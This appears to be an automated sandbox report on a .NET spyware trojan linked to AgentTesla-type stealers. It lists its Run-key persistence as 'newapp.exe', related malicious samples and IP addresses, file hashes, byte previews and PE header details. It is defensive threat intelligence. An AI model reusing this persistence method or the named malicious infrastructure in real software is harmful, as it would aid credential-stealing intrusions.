                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:dhPWt112uC.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@19/9@2/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 297
                                                                                      • Number of non-executed functions: 32
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      TimeTypeDescription
                                                                                      02:33:56API Interceptor8379046x Sleep call for process: dhPWt112uC.exe modified
                                                                                      02:33:57API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                      02:34:13API Interceptor6343123x Sleep call for process: newapp.exe modified
                                                                                      07:33:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                      07:34:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      192.254.225.136iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  TECHNICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                        QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          104.26.13.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • api.ipify.org/
                                                                                                          BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                          • api.ipify.org/
                                                                                                          lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                          • api.ipify.org/
                                                                                                          Simple1.exeGet hashmaliciousUnknownBrowse
                                                                                                          • api.ipify.org/
                                                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • api.ipify.org/
                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                          • api.ipify.org/
                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                          • api.ipify.org/
                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                          • api.ipify.org/
                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                          • api.ipify.org/
                                                                                                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                                          • api.ipify.org/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          api.ipify.orgJuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          jKqPSehspS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSh8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          z6tNjJC614.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.42.77
                                                                                                          b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.56.70
                                                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                          • 104.20.4.235
                                                                                                          Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.48.1
                                                                                                          rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.88.139
                                                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.80.1
                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          UNIFIEDLAYER-AS-1USJuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 192.254.186.165
                                                                                                          4LbgdNQgna.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.241.62.63
                                                                                                          toIuQILmr1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.241.62.63
                                                                                                          LfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.241.62.63
                                                                                                          zdmZjYqz44.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 108.179.234.136
                                                                                                          ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 50.87.139.143
                                                                                                          iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 192.254.225.136
                                                                                                          RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.241.62.63
                                                                                                          ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 192.254.186.165
                                                                                                          28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.241.62.63
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eh8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                          • 104.26.13.205
                                                                                                          JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.26.13.205
                                                                                                          JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          File Type:Unknown
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                          Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2232
                                                                                                          Entropy (8bit):5.3810236212315665
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lylWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:lGLHxv2IfLZ2KRH6OugEs
                                                                                                          MD5:7A5C31D328774D48CBCD5C8108EA608A
                                                                                                          SHA1:6570C3FDC55676ED1E8F6FA7DB0401E9F0DDB50E
                                                                                                          SHA-256:340522D923513A2541606E5F4844C71AED79CE5D215607B8C2F89210EED08EFB
                                                                                                          SHA-512:6B210B7C8048A9B448ED6C76E4A83915D236909B859D834CB51FAC34C443B898318BEB1FF2FA38B626CA9DE60DE464DD55402E3133F83F93214565B7F81D88BA
                                                                                                          Malicious:false
                                                                                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):889344
                                                                                                          Entropy (8bit):7.656416431623408
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:zBXaePxOLRTgnZZSS+5VKGIUuZfEfCk7nXFGxR3X3N:9XaePxOLJgnZ0SQVKGSYCGYxRH3N
                                                                                                          MD5:2327E5C20B3CCE0BE582DBE461480CC2
                                                                                                          SHA1:42D14AE8B60E22F36F487D8C3BEE1AD43199170F
                                                                                                          SHA-256:97B6842B7AE2E92619F7001E81705C62395FD8D4A2D5DBFA20B47976AAA3CDD1
                                                                                                          SHA-512:01F3C2EE422CCB7DB9ACBEDC078D0D485508443DE3366959DF5AB9C4CD5EB67EE5D0DCA29EE45C9A09A1ADC8509E6BD4B28BDFC325C2310091E960338273009E
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|...............0.............:.... ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text...@.... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H........d...K......`........D...........................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....
                                                                                                          Process:C:\Users\user\Desktop\dhPWt112uC.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:true
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.656416431623408
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:dhPWt112uC.exe
                                                                                                          File size:889'344 bytes
                                                                                                          MD5:2327e5c20b3cce0be582dbe461480cc2
                                                                                                          SHA1:42d14ae8b60e22f36f487d8c3bee1ad43199170f
                                                                                                          SHA256:97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1
                                                                                                          SHA512:01f3c2ee422ccb7db9acbedc078d0d485508443de3366959df5ab9c4cd5eb67ee5d0dca29ee45c9a09a1adc8509e6bd4b28bdfc325c2310091e960338273009e
                                                                                                          SSDEEP:24576:zBXaePxOLRTgnZZSS+5VKGIUuZfEfCk7nXFGxR3X3N:9XaePxOLJgnZ0SQVKGSYCGYxRH3N
                                                                                                          TLSH:FD1501582A56CC02DA955BB509B2F2B8677C6DEAB905E202DFDC7DEB7A36F001C14313
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|...............0.............:.... ... ....@.. ....................................@................................
                                                                                                          Icon Hash:333333ab693b9b98
                                                                                                          Entrypoint:0x4b113a
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0xEB7C088D [Sat Mar 12 13:20:13 2095 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb10e80x4f.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x29a10.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xdc0000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xaf4840x70.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000xaf1400xaf200a3d1d39087eacdede2a1ce67e4d9522bFalse0.9158274223768736data7.760942472660535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
